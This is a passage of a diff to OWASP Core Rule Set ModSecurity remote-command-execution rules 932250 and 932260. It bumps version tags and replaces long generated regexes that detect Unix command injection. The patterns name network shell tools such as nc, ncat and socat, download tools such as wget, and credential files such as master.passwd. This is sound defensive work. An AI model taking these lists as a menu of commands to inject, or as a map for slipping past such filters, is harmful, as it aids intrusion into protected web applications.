(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[arx])?|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?j|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dg]|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[chr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|[kz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s|z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?4)?)|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)(?:[\s\x0b&\),<>\|]|$)" \
     "id:932250,\
     phase:2,\
     block,\
@@ -471,9 +478,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -516,7 +524,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 932260
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:a(?:ddgroup|nsible)|b(?:ase(?:32|64|nc)|lkid|sd(?:cat|iff|tar)|u(?:iltin|nzip2|sybox)|yobu|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:h(?:ef[\s\x0b&\)\-<>\|]|g(?:passwd|rp)|pass|sh)|lang\+\+|o(?:mm[\s\x0b&\)<>\|]|proc)|(?:ron|scli)[\s\x0b&\)<>\|])|d(?:iff[\s\x0b&\)<>\|]|mesg|oas)|e(?:2fsck|grep)|f(?:grep|iletest|tp(?:stats|who))|g(?:r(?:ep[\s\x0b&\)<>\|]|oupmod)|unzip|z(?:cat|exe|ip))|htop|l(?:ast(?:comm|log(?:in)?)|ess(?:echo|(?:fil|pip)e)|ftp(?:get)?|osetup|s(?:-F|b_release|cpu|mod|of|pci|usb)|wp-download|z(?:4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:ilq|ster\.passwd)|k(?:fifo|nod|temp)|locate|ysql(?:admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:\.(?:openbsd|traditional)|at)|et(?:(?:c|st)at|kit-ftp|plan)|ohup|ping|stat)|onintr|p(?:dksh|er(?:f[\s\x0b&\)<>\|]|l[\s\x0b&\)5<>\|])|(?:ft|gre)p|hp(?:-cgi|[57])|igz|k(?:exec|ill)|(?:op|se)d|rint(?:env|f[\s\x0b&\)<>\|])|tar(?:diff|grep)?|wd\.db|y(?:thon[23]|3?versions))|r(?:(?:bas|ealpat)h|m(?:dir[\s\x0b&\)<>\|]|user)|nano|sync)|s(?:diff|e(?:ndmail|t(?:env|sid))|ftp|(?:h\.distri|pwd\.d)b|ocat|td(?:err|in|out)|udo|ysctl)|t(?:ailf|c(?:p(?:ing|traceroute)|sh)|elnet|imeout[\s\x0b&\)<>\|]|raceroute6?)|u(?:n(?:ame|lz(?:4|ma)|(?:pig|x)z|rar|zstd)|ser(?:(?:ad|mo)d|del))|vi(?:gr|pw|sudo)|w(?:get|hoami)|x(?:args|z(?:c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more))|z(?:c(?:at|mp)|diff|[ef]?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|std(?:(?:ca|m)t|grep|less)?))" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:a(?:ddgroup|nsible|rj(?:-register|disp)|tobm(?:[\s\x0b&\),<>\|]|$))|b(?:ase(?:32|64|nc)|(?:lkid|yobu)(?:[\s\x0b&\),<>\|]|$)|sd(?:cat|iff|tar)|u(?:iltin|nzip2|sybox)|z(?:c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|diff|e(?:grep|xe(?:[\s\x0b&\),<>\|]|$))|f?grep|ip2(?:[\s\x0b&\),<>\|]|$|recover)|less|more))|c(?:[89]9-gcc|h(?:(?:attr|mod|o(?:om|wn)|sh)(?:[\s\x0b&\),<>\|]|$)|ef-|g(?:passwd|rp(?:[\s\x0b&\),<>\|]|$))|pass)|lang\+\+|o(?:bc(?:[\s\x0b&\),<>\|]|$|run)|mm(?:[\s\x0b&\),<>\|]|$)|proc)|(?:p(?:an|io)|scli)(?:[\s\x0b&\),<>\|]|$))|d(?:(?:iff|mesg|vips)(?:[\s\x0b&\),<>\|]|$)|o(?:as(?:[\s\x0b&\),<>\|]|$)|cker-)|pkg(?:[\s\x0b&\),\-<>\|]|$))|e(?:2fsck|(?:fax|grep|macs|nd(?:if|sw)|sac|xpr)(?:[\s\x0b&\),<>\|]|$))|f(?:d(?:(?:find|isk)(?:[\s\x0b&\),<>\|]|$)|u?mount)|grep(?:[\s\x0b&\),<>\|]|$)|iletest|ping(?:[\s\x0b&\),6<>\|]|$)|tp(?:stats|who))|g(?:(?:core|insh|z(?:cat|exe|ip))(?:[\s\x0b&\),<>\|]|$)|hc(?:-(?:[\s\x0b&\),<>\|]|$)|i(?:[\s\x0b&\),\-<>\|]|$))|r(?:(?:cat|ep)(?:[\s\x0b&\),<>\|]|$)|oupmod)|unzip)|(?:htop|jexec)(?:[\s\x0b&\),<>\|]|$)|i(?:(?:conv|ftop)(?:[\s\x0b&\),<>\|]|$)|pp(?:eveprinter|find|tool))|l(?:ast(?:comm(?:[\s\x0b&\),<>\|]|$)|log(?:in)?)|ess(?:echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|$|get)|osetup|s(?:(?:-F|cpu|hw|mod|of|pci|usb)(?:[\s\x0b&\),<>\|]|$)|b_release)|wp-download|z(?:4c(?:[\s\x0b&\),<>\|]|$|at)|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|$|dec|info)|ore)))|m(?:a(?:(?:ilq|wk)(?:[\s\x0b&\),<>\|]|$)|ster\.passwd)|k(?:fifo|nod(?:[\s\x0b&\),<>\|]|$)|temp)|locate|ysql(?:[\s\x0b&\),<>\|]|$|admin|dump(?:slow)?|hotcopy|show))|n(?:(?:a(?:sm|wk)|(?:ma|ohu)p|ping|roff|stat)(?:[\s\x0b&\),<>\|]|$)|c(?:\.(?:openbsd|traditional)|at(?:[\s\x0b&\),<>\|]|$))|et(?:(?:c|st)at|kit-ftp|plan))|o(?:nintr|pkg(?:[\s\x0b&\),<>\|]|$))|p(?:d(?:b(?:2mb|3(?:[\s\x0b&\),\.<>\|]|$))|ksh(?:[\s\x0b&\),<>\|]|$))|(?:er(?:f|l5?)|(?:ft|gre)p|igz|(?:op|ush)d|s(?:ed|ql))(?:[\s\x0b&\),<>\|]|$)|hp(?:-cgi|[57](?:[\s\x0b&\),<>\|]|$))|k(?:exec|ill(?:[\s\x0b&\),<>\|]|$))|rint(?:env|f(?:[\s\x0b&\),<>\|]|$))|tar(?:[\s\x0b&\),<>\|]|$|diff|grep)|wd\.db|y(?:3?versions|thon[23]))|r(?:(?:aku|bash|nano|pmdb|vi(?:ew|m))(?:[\s\x0b&\),<>\|]|$)|e(?:boot(?:[\s\x0b&\),<>\|]|$)|alpath)|m(?:dir(?:[\s\x0b&\),<>\|]|$)|user)|sync(?:-ssl|[\s\x0b&\),<>\|]|$))|s(?:(?:diff|ftp|lsh|ocat)(?:[\s\x0b&\),<>\|]|$)|e(?:ndmail(?:[\s\x0b&\),<>\|]|$)|t(?:env|sid))|h(?:\.distrib|uf(?:[\s\x0b&\),<>\|]|$))|pwd\.db|td(?:err|in(?:[\s\x0b&\),<>\|]|$)|out)|udo